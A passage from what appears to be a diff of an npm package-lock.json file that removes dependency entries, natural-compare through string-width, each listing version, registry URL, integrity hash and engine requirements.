"sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha1-Sr6/7tdUHywnrPspvbvRXI1bpPc=", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.14", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.14.tgz", - "integrity": "sha512-y10wOWt8yZpqXmOgRo77WaHEmhYQYGNA6y421PKsKYWEK8aW+cqAphborZDhqfyKrbZEN92CN1X2KbafY2s7Yw==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.2.tgz", - "integrity": "sha512-KQZkNU+xn02lWrFu5Vjqg9E81yPtDSxUZorRHlLWVoojD+H/0GFbH59kcnz5Thdjj7c4/mYMBPj/mhvGe/kKXA==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/optionator": { - "version": "0.9.1", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.1.tgz", - "integrity": "sha512-74RlY5FCnhq4jRxVUPKDaRwrVNXMqsGsiW6AJw4XK8hmtm10wC0ypZBLw5IIp85NZMr91+qd1RvvENwg7jjRFw==", - "dev": true, - "peer": true, - "dependencies": { - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0", - "word-wrap": "^1.2.3" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "dependencies": { - "callsites": "^3.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/path-scurry": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.10.2.tgz", - "integrity": "sha512-7xTavNy5RQXnsjANvVvMkEjvloOinkAjv/Z6Ildz9v2RinZ4SBKTWFOVRbaF8p0vpHnyjV/UwNDdKuUv6M5qcA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/path-scurry/node_modules/lru-cache": { - "version": "10.2.2", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.2.2.tgz", - "integrity": "sha512-9hp3Vp2/hFQUiIwKo8XCeFVnrg8Pk3TYNPIR7tJADKi5YfcF7vEaK7avFHTlSy3kOKYaJQaalfEo6YuXdceBOQ==", - "engines": { - "node": "14 || >=16.14" - } - }, - "node_modules/path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/progress": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz", - "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/regexpp": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", - "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", - "dev": true, - "peer": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/mysticatea" - } - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/require-from-string": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", - "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-cwd/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.3.tgz", - "integrity": "sha512-MjOWxM065+WswwnmNONOT+bD1nXzY9Km6u3kzvnx8F8/HXGZdz3T6e6vZJ8Q/RIMUSp/nxqjH3GwvJDy8ijeQQ==" - }, - "node_modules/rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "dependencies": { - "glob": "^7.1.3" - }, - "bin": { - "rimraf": "bin.js" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/slice-ansi": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", - "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", - "dev": true, - "peer": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "astral-regex": "^2.0.0", - "is-fullwidth-code-point": "^3.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/slice-ansi?sponsor=1" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.18.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", - "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stack-utils/node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": 